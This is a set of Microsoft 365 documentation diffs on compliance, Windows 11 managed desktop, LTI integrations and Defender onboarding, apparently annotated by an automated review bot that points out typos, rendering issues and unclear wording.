3. Select the priority user group you want to edit and select **Delete** from the dashboard menu. 4. On the **Delete** dialog, select **Yes** to delete the priority user group or select **Cancel** to return to the dashboard.
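Review bot: step 3 says "Select the priority user group you want to edit and select **Delete**"; "edit" should be "delete". The procedure also does not say what happens to a policy that has this group assigned (the *Data leaks by priority users* policy in the example at the top of the section): whether deletion is blocked, or the policy is left without a group. One sentence either way would save a support call.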
Customers with Microsoft 365 subscriptions that include insider risk management
The following Power Automate templates are provided to customers to support process automation for insider risk management users and cases: -- **Notify users when they're added to an insider risk policy**: This template is for organizations that have internal policies, privacy, or regulatory requirements that users must be notified when they are subject to insider risk management policies. When this flow is configured and selected for a user in the users page, users and their managers are sent an email message when the user is added to an insider risk management policy. This template also supports updating a SharePoint list hosted on a SharePoint site to help track notification message details like date/time and the message recipient. If you've chosen to anonymize users in **Privacy settings**, flows created from this template will not function as intended so that user privacy is maintained. Power Automate flows using this template are available on the **Users dashboard**.
+- **Notify users when they're added to an insider risk policy**: This template is for organizations that have internal policies, privacy, or regulatory requirements that users must be notified when they are subject to insider risk management policies. When this flow is configured and selected for a user in the **Users** page, users and their managers are sent an email message when the user is added to an insider risk management policy. This template also supports updating a SharePoint list hosted on a SharePoint site to help track notification message details like date/time and the message recipient. If you've chosen to anonymize users in **Privacy settings**, flows created from this template will not function as intended so that user privacy is maintained. Power Automate flows using this template are available on the **Users dashboard**.
- **Request information from HR or business about a user in an insider risk case**: When acting on a case, insider risk analysts and investigators may need to consult with HR or other stakeholders to understand the context of the case activities. When this flow is configured and selected for a case, analysts and investigators send an email message to HR and business stakeholders configured for this flow. Each recipient is sent a message with pre-configured or customizable response options. When recipients select a response option, the response is recorded as a case note and includes recipient and date/time information. If you've chosen to anonymize users in **Privacy settings**, flows created from this template will not function as intended so that user privacy is maintained. Power Automate flows using this template are available on the **Cases dashboard**. - **Notify manager when a user has an insider risk alert**: Some organizations may need to have immediate management notification when a user has an insider risk management alert. When this flow is configured and selected, the manager for the case user is sent an email message with the following information about all case alerts: - Applicable policy for the alert
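Review bot: the only change in this hunk bolds the **Users** page, but the same bullet then says the flows are available on the **Users dashboard**; pick one name. Separately, "flows created from this template will not function as intended so that user privacy is maintained" reads as if breaking the flow is the goal; say plainly that when anonymization is on the flow cannot identify the user, so the email to the user and the manager is not sent. The same wording is repeated in the second bullet.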
compliance Privacy Management https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/compliance/privacy-management.md
In accordance with certain privacy regulations, for example General Data Protect
Privacy management in Microsoft 365 can help you handle these inquiries through the subject rights request solution. It provides automation and workflow capabilities for helping you search for subject data that youΓÇÖve stored in Microsoft 365, review the findings, select the appropriate files, and produce reports. Along the way, you can securely collaborate with other experts in your organization to bring the request to completion.
-Note that this subject rights request solution provides capabilities beyond the original data subject requests (DSR) solution in the compliance center, and there is no connection or sharing of workflows between the two. The legacy DSR page will be retired at a later date.
- To learn more, see [Manage subject rights requests](privacy-management-subject-rights-requests.md). ## How we evaluate your data
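Review bot: this hunk removes the note that the subject rights request solution shares no workflows with the legacy data subject requests (DSR) page and that the DSR page will be retired, and also removes the "To learn more, see [Manage subject rights requests]" line without a replacement; if the cross-reference is not kept elsewhere, readers lose the only link from this section to the subject rights request article. If only the retirement date was the problem, keep the first half of the note (no connection between the two solutions), since that is what stops admins from expecting DSR cases to show up here.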
compliance Sensitive Information Type Learn About https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/compliance/sensitive-information-type-learn-about.md
localization_priority: Normal - M365-security-compliance
-description: ""
+description: "This article gives an overview of sensitive information types and how they detect sensitive information like social security, credit card, or bank account numbers to identify sensitive items"
# Learn about sensitive information types
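Review bot: the new description has no terminal period and runs an example list into a purpose clause ("...bank account numbers to identify sensitive items"); suggest "This article gives an overview of sensitive information types and how they detect sensitive information such as Social Security, credit card, or bank account numbers."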
Sensitive information types are pattern-based classifiers. They detect sensitive
## Sensitive information types are used in -- [Data loss prevention policies](dlp-learn-about-dlp.md)
+- [Data loss prevention policies](dlp-learn-about-dlp.md)
- [Sensitivity labels](sensitivity-labels.md) - [Retention labels](retention.md) - [Insider risk management](insider-risk-management.md) - [Communication compliance](communication-compliance.md) - [Auto-labelling policies](apply-sensitivity-label-automatically.md#how-to-configure-auto-labeling-for-office-apps)
+- [Privacy management (preview)](privacy-management.md)
## Fundamental parts of a sensitive information type
compliance Sensitivity Labels https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/compliance/sensitivity-labels.md
When you configure a label policy, you can:
- **Specify a default label** for new documents, unlabeled emails, and new containers (when you've [enabled sensitivity labels for Microsoft Teams, Microsoft 365 groups, and SharePoint sites](sensitivity-labels-teams-groups-sites.md)). You can specify the same label for all three types of items, or different labels. When you specify a default label for documents, the Azure Information Protection unified labeling client also applies this label to existing documents that are unlabeled. Users can always change the default label if it's not the right label for their document or email.
+ > [!IMPORTANT]
+ > When you have [sublabels](#sublabels-grouping-labels), be careful not to configure the parent label as a default label.
+
Consider using a default label to set a base level of protection settings that you want applied to all your content. However, without user training and other controls, this setting can also result in inaccurate labeling. It's usually not a good idea to select a label that applies encryption as a default label to documents. For example, many organizations need to send and share documents with external users who might not have apps that support the encryption or they might not use an account that can be authorized. For more information about this scenario, see [Sharing encrypted documents with external users](sensitivity-labels-office-apps.md#sharing-encrypted-documents-with-external-users). - **Require a justification for changing a label.** If a user tries to remove a label or replace it with a label that has a lower-order number, you can require the user provides a justification to perform this action. For example, a user opens a document labeled Confidential (order number 3) and replaces that label with one named Public (order number 1). For Office apps, this justification prompt is triggered once per app session when you use built-in labeling, and per file when you use the Azure Information Protection unified labeling client. Administrators can read the justification reason along with the label change in [activity explorer](data-classification-activity-explorer.md).
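Review bot: the added IMPORTANT box tells admins not to configure a parent label as the default label when sublabels exist but gives no reason; one clause on the consequence (what the client does when the configured default cannot be applied) would make the warning actionable, or link the sentence in the sublabels section that explains it rather than the section anchor. Also check the indentation of the `>` lines: the box sits between the bullet and the "Consider using a default label" paragraph and needs to render as part of the bullet rather than breaking the list.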
enterprise Microsoft 365 Connectivity Optics https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/enterprise/microsoft-365-connectivity-optics.md
description: This article contains information about Microsoft 365 Connectivity
# Microsoft 365 Connectivity Optics
-This article is in progress.
+This document describes some of the connectivity optics Microsoft typically collects from customer devices, and describes some of the ways Microsoft uses such data to analyze and optimize service delivery and to assess and ensure the best possible end-user experience.
+Connectivity optics are generally collected from Microsoft applications, which may be installed on end-user devices or accessed from browsers. Unlike optional data collection within Microsoft 365 services, many of the connectivity optics described here are integral to ensuring that Microsoft meets our availability and performance commitment to customers. These optics allow Microsoft to quickly detect and respond to any issues in the connectivity path between end-users and Microsoft service endpoints. Some of these optics are also used to enable features such as [Network connectivity in the Microsoft 365 Admin Center](office-365-network-mac-perf-overview.md).
+
+## Optics collected from Microsoft 365 applications
+
+Optics are currently collected using infrequent sampling across all devices. As a general matter, the specific set of optics and destinations (service endpoints) which are to be measured in a particular iteration are configured by Microsoft based on service requirements and randomized for sampling purposes.
+At each optics collection interval, one or more of the following measurements may be collected using the end-user device as the measurement source and a Microsoft 365 service endpoint as the measurement destination:
+
+| Measurement | Description |
+| | |
+| Latency | Time taken to retrieve a small file via HTTP |
+| Throughput | Time taken to retrieve a larger file via HTTP, measured rarely to avoid excessive bandwidth consumption |
+| Round Trip Time (RTT) | ICMP ping |
+| Traceroute | ICMP traceroute |
+
+Each measurement is typically associated with additional information, which may include the following items:
+
+| Item | Description |
+| | |
+| Tenant ID | Unique identifier for the customer's Azure Active Directory tenant associated with the end-user device. |
+| Monitor ID | Identifier for the application generating the request (such as Outlook, OneDrive, etc.), provided by the client application that is performing the measurement. |
+| Request ID | Identifier for the measurement request, specified in the measurement configuration provided by Microsoft. |
+| Remote IP | Masked source IP associated with the request from client to service endpoint, provided by the server that received the measurement request and computed based upon the client source IP address that is visible to Microsoft. IP addresses are masked to a /24 subnet for IPv4 addresses or a /48 subnet for IPv6 addresses to ensure that Microsoft cannot identify individual devices or users. |
+| Front-end | Microsoft 365 service front-end identifier, provided by the server that received the measurement request. |
+| Endpoint | Microsoft 365 service endpoint location, provided by the server that received the measurement request. |
+| Certificate Issued By | The "certificate issued by" property of the SSL certificate presented while connecting to the service endpoint, which indicates the certificate authority who issued the certificate to the service endpoint. |
+| Certificate Thumbprint | The "certificate thumbprint" property of the SSL certificate presented while connecting to the service endpoint, which is a publicly accessible unique identifier of the certificate. |
+| Latitude/Longitude | The abstracted latitude and longitude of the end-user device. This is only collected for tenants who have enabled Windows Location Service on end-user devices and have also [enabled collection of this information in the Microsoft 365 admin portal](office-365-network-mac-perf-overview.md#1-enable-windows-location-services). |
+
+## Measurement process
+
+Each end-user device will typically perform a measurement either on a scheduled basis (for installed applications) or based on the action of loading browser pages (for web-based applications). Measurement activities are performed as background operations and do not impact application experience for users. As the measurement types and destinations which will be used for a particular iteration of this process are randomized, customers may notice requests to Microsoft service endpoints in their region that are similar to the typical requests made by end-user devices for normal application connectivity. In addition, customers may notice requests to Microsoft service endpoints that are well outside of their local region. These measurements are often used to ensure optimal routing of customer requests to the best service endpoint, as changes to customer and ISP infrastructure may require Microsoft to change our request routing policies on an ongoing basis. Learn more about how Microsoft routes traffic to the best service endpoint and how to optimize connectivity to Microsoft 365 services in the [Microsoft 365 networking connectivity overview](microsoft-365-networking-overview.md).
+
+## Service endpoints
+
+The Microsoft service endpoints that are used as destinations for these measurements are contained within the published [Office 365 URLs and IP address ranges](urls-and-ip-address-ranges.md). Access to additional service endpoints are not necessary for the collection of these connectivity optics.
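Review bot: both tables use "| | |" as the separator row, which is not a valid Markdown header separator, so the Measurement and Item tables will not render as tables; use "|---|---|". On the Remote IP row, masking to /24 (IPv4) or /48 (IPv6) is said to "ensure that Microsoft cannot identify individual devices or users", but the same record also carries Tenant ID and, where enabled, abstracted latitude/longitude; scope the claim to the IP field alone rather than to the record. Smaller items: "SSL certificate" in the two Certificate rows should be "TLS certificate"; "Access to additional service endpoints are not necessary" should be "is not necessary"; and since RTT and Traceroute are ICMP, the Service endpoints section should say whether ICMP to the published endpoints must be permitted, as many enterprise egress policies block it and the text otherwise says nothing beyond the URL and IP ranges is needed.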
enterprise Microsoft 365 Ip Web Service https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/enterprise/microsoft-365-ip-web-service.md
This URI returns the latest version of the specified Office 365 service instance
} ```
-Example 3 request URI: <https://endpoints.office.com/version/Worldwide?Format=CSV&amp;ClientRequestId=b10c5ed1-bad1-445f-b386-b919946339a7>
+Example 3 request URI: <https://endpoints.office.com/version/Worldwide?Format=CSV&ClientRequestId=b10c5ed1-bad1-445f-b386-b919946339a7>
This URI shows output in CSV format. Example result:
instance,latest
Worldwide,2018063000 ```
-Example 4 request URI: <https://endpoints.office.com/version/Worldwide?AllVersions=true&amp;ClientRequestId=b10c5ed1-bad1-445f-b386-b919946339a7>
+Example 4 request URI: <https://endpoints.office.com/version/Worldwide?AllVersions=true&ClientRequestId=b10c5ed1-bad1-445f-b386-b919946339a7>
This URI shows all prior versions that have been published for the Office 365 worldwide service instance. Example result:
enterprise Ms Cloud Germany Transition Add Devices https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/enterprise/ms-cloud-germany-transition-add-devices.md
It's critical to your success that you only unregister and re-register your devi
To check whether your devices are registered in the public cloud, you should export and download the list of devices from the Azure AD portal to an Excel spreadsheet. Then, filter the devices that are registered (by using the _registeredTime_ column) after the date when your organization has passed [phase 9 of the migration process](ms-cloud-germany-transition-phases.md#phase-9--10-azure-ad-finalization).
-**Do I still need to add the DNS name as stated in this [Create DNS records for Microsoft using Windows-based DNS](https://docs.microsoft.com/en-us/microsoft-365/admin/dns/create-dns-records-using-windows-based-dns?view=o365-worldwide#add-two-cname-records-for-mobile-device-management-mdm-for-microsoft)
+**Do I still need to add the DNS name as stated in [Create DNS records for Microsoft using Windows-based DNS](/microsoft-365/admin/dns/create-dns-records-using-windows-based-dns?view=o365-worldwide#add-two-cname-records-for-mobile-device-management-mdm-for-microsoft)?**
This DNS entry is no longer needed for re-registering your device.
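Review bot: the relative link still carries "?view=o365-worldwide"; docs-relative links normally drop the view query so the page follows the reader's selected version. The answer "This DNS entry is no longer needed" is singular while the linked anchor is "add-two-cname-records"; say whether both CNAME records, or only one of them, are no longer needed for re-registration.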
lti Teams Classes With Blackboard https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/lti/teams-classes-with-blackboard.md
Title: Integrate Microsoft Teams classes with Blackboard Learn Ultra
+ Title: Use Microsoft Teams classes with Blackboard Learn Ultra
f1.keywords:
localization_priority: Normal
-description: "Integrate Microsoft Teams classes with Blackboard Learn Ultra"
+description: "Use Microsoft Teams classes with Blackboard Learn Ultra"
# Use Microsoft Teams classes with Blackboard Learn Ultra
Teamwork is at the core of every modern organization. By fostering collaboration
Your classes might include real-time conversations, video meetings, or asynchronous interactions. You can add file sharing and cocreation experiences for your students, all in one place. Microsoft Teams classes with Learn Ultra redefine the dynamics of teaching and what effective learning means. > [!IMPORTANT]
-> Ensure that you have successfully set up the Institution Email field in your Student Information System (SIS) `help.blackboard.com/Learn/Administrator/SaaS/Integrations/Student\_Information\_System/SIS\_Planning`
+> Ensure that you have successfully set up the Institution Email field in your [Student Information System (SIS)](https://help.blackboard.com/Learn/Administrator/SaaS/Integrations/Student_Information_System/SIS_Planning)
>
->The Microsoft Teams classes integration relies on the institution email field in your SIS to map to the correct Microsoft Azure Active DirectoryΓÇÖs (AAD) User Principal Name (UPN). If no institution email has been provisioned, this will default to the existing email. ItΓÇÖs recommended that this field be set for every user to ensure their data is synchronized correctly and that there is no conflict of email data between Microsoft AAD and Blackboard Learn Ultra.
+>The Microsoft Teams classes integration relies on the institution email field in your SIS to map to the correct Microsoft Azure Active DirectoryΓÇÖs (AAD) [User Principle Name (UPN)](/azure/active-directory/hybrid/howto-troubleshoot-upn-changes). If no institution email has been provisioned, this will default to the existing email. ItΓÇÖs recommended that this field be set for every user to ensure their data is synchronized correctly and that there is no conflict of email data between AAD and Blackboard Learn Ultra.
> > If you havenΓÇÖt set this field appropriately in your SIS mapping, the integration will continue to work, but users might not appear in the Teams classes created, and errors could occur. ## Supporting Institutional Data Mapping ΓÇô Institution Email SIS Field
-As part of the evolution with Cloud provider integrations, Blackboard Learn Ultra has created a new **Institution Email** field, in both the Student Information System Framework integration and public REST APIs, allowing institutions to manage the data synchronization process effectively between Blackboard Learn Ultra and Microsoft AAD.
+As part of the evolution with Cloud provider integrations, Blackboard Learn Ultra has created a new **Institution Email** field, in both the Student Information System Framework integration and public REST APIs, allowing institutions to manage the data synchronization process effectively between Blackboard Learn Ultra and AAD.
### What does the Institution Email mean and what does it support?
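Review bot: the added line introduces a regression: "User Principal Name (UPN)" in the removed line became "User Principle Name (UPN)" in the added one; restore "Principal". The fallback sentence ("If no institution email has been provisioned, this will default to the existing email") is the mechanism behind the "users might not appear in the Teams classes created" warning that follows; linking the two in one sentence would make clear that a stale or mismatched email is an identity-mapping problem, not a cosmetic one.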
The Microsoft Teams classes integration is available for **Ultra Course View cou
- Have Blackboard Learn Ultra Learn SaaS with Ultra Base Navigation enabled
+ ![an example of the feature is enabled in courses](media/feature-availability.png)
+ - Enable LTI for use in courses. a. Go to the **Administrator Panel** > **LTI Tool Providers** > **Manage Global Properties**.
If you choose to approve the Blackboard Learn Ultra Teams Classes Azure app befo
> [!NOTE] > YouΓÇÖll replace **{Tenant}** with your specific institutional Microsoft Azure tenant ID.
+You'll see a permissions window that explains you're giving permission to Blackboard Learn Ultra to access Microsoft Teams.
+
+![the permissions window for Microsoft and Blackboard](media/permissions1.png)
+ ### After Configuring the LTI Applications 1. On the **Administrator Panel**, navigate to **Tools and Utilities** and select **Microsoft Teams Integration Admin**.
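Review bot: the added sentence describes the permissions window only as "giving permission to Blackboard Learn Ultra to access Microsoft Teams". Since this is a tenant-wide consent granted by a Global Admin through the {Tenant} URL above, list the permissions being requested, or at least tell the approver to read the scopes on the consent screen and compare them with the screenshot before accepting, rather than presenting the dialog as something to click through.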
If you choose to approve the Blackboard Learn Ultra Teams Classes Azure app befo
- If consent hasnΓÇÖt been approved, follow the steps described to generate the URL for consent and send it to the Microsoft 365 Global Admin for approval. 5. Once you've confirmation of approval, select **Retry** to confirm, and then select **Submit**.+
+ ![A dialog that indicates your access has been blocked](media/blocked-access.png)
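Review bot: the screenshot with alt text "A dialog that indicates your access has been blocked" is placed after step 5, which is the success path (confirmation of approval, **Retry**, **Submit**), but it depicts the failure case from the "If consent hasn't been approved" bullet; move it under that bullet or caption it as the state seen before consent is granted. The trailing "+" after "select **Submit**." on the preceding line also looks like a stray character.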
lti Teams Meetings With Canvas https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/lti/teams-meetings-with-canvas.md
description: "Integrate Microsoft Teams meetings with Canvas"
# Use Microsoft Teams meetings with Canvas
-> [!IMPORTANT]
-> Some information relates to prereleased product which may be substantially modified before it's commercially released. Microsoft makes no warranties, express or implied, with respect to the information provided here.
- Microsoft Teams meetings is a Learning Tools Interoperability (LTI) app that helps educators and students easily navigate between their Learning Management System (LMS) and Teams. Users can access their class teams associated with their course directly from within their LMS. ## Microsoft Office 365 Admin
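Review bot: this hunk removes the prerelease IMPORTANT notice while the description and heading stay unchanged; confirm the Teams meetings LTI app is generally available and record that in the change, otherwise the removal reads as accidental and is likely to be reverted.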
managed-desktop Win11 Overview https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/managed-desktop/intro/win11-overview.md
+
+ Title: Microsoft Managed Desktop and Windows 11
+description: How and when Windows 11 is available in the service
+keywords: Microsoft Managed Desktop, Microsoft 365, service, documentation
+++++
+ms.localizationpriority: normal
+++
+# Microsoft Managed Desktop and Windows 11
+
+Following the announcement of Windows 11, you might have started planning Windows 11 migrations as part of your efforts to keep Windows 10 devices up to date. This article outlines important considerations and how Microsoft Managed Desktop will support smooth transitions in your environments. For information about Windows 11 itself, see [Windows 11 overview](/windows/whats-new/windows-11).
+
+For specific steps to follow to get Windows 11 installed on your Microsoft Managed Desktop devices, see [Preview and test Windows 11 with Microsoft Managed Desktop](../working-with-managed-desktop/test-win11-mmd.md).
+
+## Timeline for Windows 11
+
+Windows 11 preview builds are available starting June 28, 2021 through the [Windows Insider Program](/windows-insider/). We expect release builds to be generally available by the end of calendar year 2021.
+
+You are welcome to install preview builds on devices whether they are managed by Microsoft Managed Desktop or not. WeΓÇÖll continue to support Windows 10 in parallel until it reaches end of support.
+
+When Windows 11 is generally available, we'll do more validation testing. We expect that January 2022 will be the soonest that Windows 11 will be offered to Microsoft Managed Desktop production devices through our standard deployment groups.
+
+We'll consult and advise admins to develop and implement migration plans for each tenant based on technical readiness and your business considerations.
+
+## Assessing pre-release versions of Windows 11
+
+More than 95% of Microsoft Managed Desktop devices are eligible for Windows 11, so you might want to preview the upgrade on test devices prior to production deployment. For more about Windows 11 system requirements, see [Windows 11 requirements](/windows/whats-new/windows-11-requirements). You can request details about the eligibility status of your devices from Microsoft Managed Desktop.
+
+For Microsoft Managed Desktop devices, you can request to add test devices to the **\[Modern Workplace\] Windows 11 Pre-Release Test Devices** device group. This group receives Windows 11 preview builds along with a Microsoft Managed Desktop baseline configuration. Microsoft Managed Desktop doesn't manage the release cadence of Windows 11 preview builds, so members of this device group might receive updates more frequently than Windows 10 device groups.
+
+For your devices that aren't managed by Microsoft Managed Desktop, you can join the [Windows Insider Program](/windows-insider/) to download preview builds and get guidance on deploying Windows 11 yourself. If you have devices running Windows 11 pre-release builds and later enroll them in Microsoft Managed Desktop, they won't revert back to Windows 10.
+
+## Support for pre-release Windows 11 devices
+
+Pre-release builds of any platform are expected to contain defects and application compatibility issues that can be identified and resolved prior to general availability. As a result, we consider devices running pre-release builds of Windows 11 to be test devices, but we do monitor them along with the rest of the environment for security threats and they are subject to the same security alert response as other Microsoft Managed Desktop devices.
+
+Because we are committed to helping you migrate to Windows 11 while remaining productive, we encourage you to report defects you encounter with pre-release builds. We prioritize defects that will block user productivity upon broad deployment of Windows 11, and defects that block user productivity on Windows 10 devices.
+
+## Testing application compatibility
+
+Application compatibility is one of the most common concerns in any platform migration due to the potential for productivity disruptions. We're using several proactive and reactive measures to help you feel confident about smooth app transitions to Windows 11.
+
+### Proactive measures
+
+**Common apps:** Microsoft is extensively testing the most common enterprise applications and suites deployed on builds of Windows 11. We work with external software publishers and internal product teams to resolve any issues discovered during testing. For more information about our proactive compatibility testing effort, see the [Application Compatibility blog](https://blogs.windows.com/windowsexperience/2019/01/15/application-compatibility-in-the-windows-ecosystem/).
+
+**Line-of-business apps:** [Test Base](https://www.microsoft.com/testbase) is a resource that app publishers and IT admins can use to submit apps and test cases for Microsoft to run on a virtual machine running Windows 11 builds in a secure Azure environment. Results, test insights, and regression analysis for each test execution are available to you on a private Azure portal. Microsoft Managed Desktop will help you prioritize your line-of-business apps for validation based on app usage and reliability data. For more information about Test Base, see [Test Base for Microsoft 365](https://techcommunity.microsoft.com/t5/windows-it-pro-blog/test-base-for-microsoft-365-microsoft-ignite-2021-updates/ba-p/2185566).
+
+### Reactive measures
+
+If you encounter app compatibility issues in test or production environments, you can get support by engaging [App Assure](/fasttrack/products-and-capabilities) or FastTrack, as appropriate. For Windows 11, this includes any functionality with Office, Microsoft Edge, and Teams applications running on the latest operating system builds. App Assure directly engages app publishers to prioritize and resolve app compatibility issues.
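Review bot: the sentence "If you have devices running Windows 11 pre-release builds and later enroll them in Microsoft Managed Desktop, they won't revert back to Windows 10" leaves open which device group those devices land in and whether the Microsoft Managed Desktop baseline configuration and the security monitoring described under "Support for pre-release Windows 11 devices" apply to them on enrollment; one sentence naming the group they are placed in would close that. Two smaller points: the "95%" eligibility figure is dated by nature and should carry an "as of" month, and the "+++++" and "+++" lines in the front matter look like stripped metadata rather than article content.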
managed-desktop Test Win11 Mmd https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/managed-desktop/working-with-managed-desktop/test-win11-mmd.md
+
+ Title: Preview and test Windows 11 with Microsoft Managed Desktop
+description: How to get Windows 11 in your environment
+keywords: Microsoft Managed Desktop, Microsoft 365, service, documentation
+++++
+ms.localizationpriority: normal
+++
+# Preview and test Windows 11 with Microsoft Managed Desktop
+
+ How to enroll and participate in the Windows 11 compatibility testing program within your Microsoft Managed Desktop environment. For more about Windows 11 and Microsoft Managed Desktop generally, see [Windows 11 and Microsoft Managed Desktop](../intro/win11-overview.md).
+
+## Check device eligibility
+
+To date, more than 95% of Microsoft Managed Desktop devices meet [eligibility criteria for Windows 11](/windows/whats-new/windows-11-requirements). You can request details about the eligibility status of your devices from Microsoft Managed Desktop. To file the request, follow these steps:
+
+1. Open a new service request with the Microsoft Managed Desktop Service Engineering team. If you need more info on how to do file the request, see [Admin support](admin-support.md).
+2. Use these values for the fields:
+ - Title: Windows 11 device eligibility
+ - Request type: Request for information
+ - Category: Devices
+ - Subcategory: Other
++
+## Add devices to the Windows 11 test group
+
+Start by adding devices to the device group (**\[Modern Workplace\] Windows 11 Pre-Release Test Devices**) created for testing and evaluating Windows 11. Devices in this group get new Windows 11 builds and Microsoft Managed Desktop baseline configurations as they become available and are monitored for reliability issues.
+
+You can choose any of your existing or new devices for Windows 11 testing, but you shouldn't enroll production devices in this group due to the elevated risk of defects or compatibility issues in pre-release builds. Prior device group assignments are removed upon assignment to this group.
+
+To enroll your devices in the pre-release test group:
+
+1. Open a new service request with the Microsoft Managed Desktop Service Engineering team.
+2. Use these values for the fields:
+ - Title: Windows 11 compatibility enrollment
+ - Request type: Change request
+ - Category: Devices
+ - Subcategory: Deployment group assignment
+3. In the description field, list the serial numbers of the devices that you want to use for Windows 11 testing. Note which, if any, of the specified devices aren't yet deployed in your Microsoft Managed Desktop tenant.
+
+## Prioritize applications to submit to Test Base
+
+Business-critical applications are the best candidates for more validation in a closed Windows 11 environment. We can help you prioritize apps for Windows 11 testing based on usage and reliability data. To request our recommendations, follow these steps:
+
+1. Open a new service request with the Microsoft Managed Desktop Service Engineering team. If you need more info on how to do file the request, see [Admin support](admin-support.md).
+2. Use these values for the fields:
+ - Title: Windows 11 Test Base candidates
+ - Request type: Request for information
+ - Category: Apps
+ - Subcategory: Other
+
+## Report issues
+
+If you encounter Windows 11 compatibility issues with your line-of-business or Microsoft 365 apps, report them to us for investigation and remediation. To report an issue, follow these steps:
+
+1. Open a new service request with the Microsoft Managed Desktop Service Engineering team.
+2. Use these values for the fields:
+ - Title: Windows 11 compatibility testing
+ - Request type: Incident
+ - Category: Devices
+ - Subcategory: Windows Upgrade/Update
+3. Describe the behavior and how severely it would hinder your business in a production environment.
+
+Microsoft Managed Desktop triages and handles issues with pre-release builds based on the effect on productivity. While our service description doesn't cover issues with pre-release builds, we'll confer with customer admins to ensure that issues that block user productivity are resolved prior to starting migration within any given tenant.
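Review bot: Both "If you need more info on how to do file the request" sentences (under Check device eligibility and under Prioritize applications) should read "how to file the request", and the front-matter delimiter lines show up in this diff as "+++++" and "+++" instead of "---", which is worth checking in the source because malformed delimiters stop the metadata block from rendering. In Add devices to the Windows 11 test group, the caveat that matters most is "Prior device group assignments are removed upon assignment to this group"; putting it directly after the warning against enrolling production devices would make clear that a device moved into the pre-release group drops out of its current deployment group and from then on receives pre-release builds and baseline configurations. Since the serial numbers listed in the request description are the only identifiers Service Engineering can act on, step 3 could also ask the admin to check them against the tenant's device list before submitting.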
security Configure Endpoints Non Windows https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/configure-endpoints-non-windows.md
You'll need to take the following steps to onboard non-Windows devices:
- For macOS devices, you can choose to onboard through Microsoft Defender for Endpoint or through a third-party solution. For more information, see [Microsoft Defender for Endpoint on Mac](/microsoft-365/security/defender-endpoint/microsoft-defender-endpoint-mac).
- - For other non-Windows devices choose **Onboard non-Windows devices through third-party integration**.
+ - For other non-Windows devices, choose **Onboard non-Windows devices through third-party integration**.
1. In the navigation pane, select **Interoperability** > **Partners**. Make sure the third-party solution is listed. 2. In the **Partner Applications** tab, select the partner that supports your non-Windows devices. 3. Select **Open partner page** to open the partner's page. Follow the instructions provided on the page.
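Review bot: This hunk only adds a comma, while the rest of this batch moves navigation paths to the Microsoft 365 Defender portal (Settings > Endpoints > ...); the unchanged step "In the navigation pane, select Interoperability > Partners" should be verified against the new portal and updated in the same change if that path has moved, otherwise the page will mix old and new navigation.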
security Evaluate Defender Endpoint Enable https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/evaluate-defender-endpoint-enable.md
+
+ Title: Pilot Defender for Endpoint evaluation
+description: Enable your Microsoft 365 Defender trial lab or pilot environment.
+keywords: Microsoft 365 Defender trial, try Microsoft 365 Defender, evaluate Microsoft 365 Defender, Microsoft 365 Defender evaluation lab, Microsoft 365 Defender pilot, cyber security, advanced persistent threat, enterprise security, devices, device, identity, users, data, applications, incidents, automated investigation and remediation, advanced hunting
+search.product: eADQiWindows 10XVcnh
+search.appverid: met150
+ms.mktglfcycl: deploy
+ms.sitesec: library
+ms.pagetype: security
+f1.keywords:
+ - NOCSH
++
+localization_priority: Normal
+
+audience: ITPro
+
+ - M365-security-compliance
+ - m365solution-overview
+ - m365solution-evalutatemtp
+
+ms.technology: m365d
++
+# Pilot MDE Evaluation
+
+>[!NOTE]
+>For the purpose of guiding you through a typical deployment, this scenario will only cover the use of Microsoft Endpoint Configuration Manager. Defender for Endpoint supports the use of other onboarding tools but won't cover those scenarios in the deployment guide. For more information, see [Onboard devices to Microsoft Defender for Endpoint](onboard-configure.md).
+
+## Step 1. Check license state
+
+Checking for the license state and whether it got properly provisioned, can be done through the admin center or through the **Microsoft Azure portal**.
+
+1. To view your licenses, go to the **Microsoft Azure portal** and navigate to the [Microsoft Azure portal license section](https://portal.azure.com/#blade/Microsoft_AAD_IAM/LicensesMenuBlade/Products).
+
+ ![Image of Azure Licensing page](images/atp-licensing-azure-portal.png)
+
+1. Alternately, in the admin center, navigate to **Billing** > **Subscriptions**.
+
+ On the screen, you'll see all the provisioned licenses and their current **Status**.
+
+ ![Image of billing licenses](images/atp-billing-subscriptions.png)
+
+## Step 2. Onboard endpoints using any of the supported management tools
+
+The [Plan deployment](deployment-strategy.md) topic outlines the general steps you need to take to deploy Defender for Endpoint.
+
+Watch this video for a quick overview of the onboarding process and learn about the available tools and methods.
+
+> [!VIDEO https://www.microsoft.com/videoplayer/embed/RE4bGqr]
+
+After identifying your architecture, you'll need to decide which deployment method to use. The deployment tool you choose influences how you onboard endpoints to the service.
+
+### Onboarding tool options
+
+The following table lists the available tools based on the endpoint that you need to onboard.
+
+| Endpoint | Tool options |
+|--||
+| **Windows** | [Local script (up to 10 devices)](../defender-endpoint/configure-endpoints-script.md) <br> [Group Policy](../defender-endpoint/configure-endpoints-gp.md) <br> [Microsoft Endpoint Manager/ Mobile Device Manager](../defender-endpoint/configure-endpoints-mdm.md) <br> [Microsoft Endpoint Configuration Manager](../defender-endpoint/configure-endpoints-sccm.md) <br> [VDI scripts](../defender-endpoint/configure-endpoints-vdi.md) <br> [Integration with Azure Defender](../defender-endpoint/configure-server-endpoints.md#integration-with-azure-defender) |
+| **macOS** | [Local scripts](../defender-endpoint/mac-install-manually.md) <br> [Microsoft Endpoint Manager](../defender-endpoint/mac-install-with-intune.md) <br> [JAMF Pro](../defender-endpoint/mac-install-with-jamf.md) <br> [Mobile Device Management](../defender-endpoint/mac-install-with-other-mdm.md) |
+| **Linux Server** | [Local script](../defender-endpoint/linux-install-manually.md) <br> [Puppet](../defender-endpoint/linux-install-with-puppet.md) <br> [Ansible](../defender-endpoint/linux-install-with-ansible.md)|
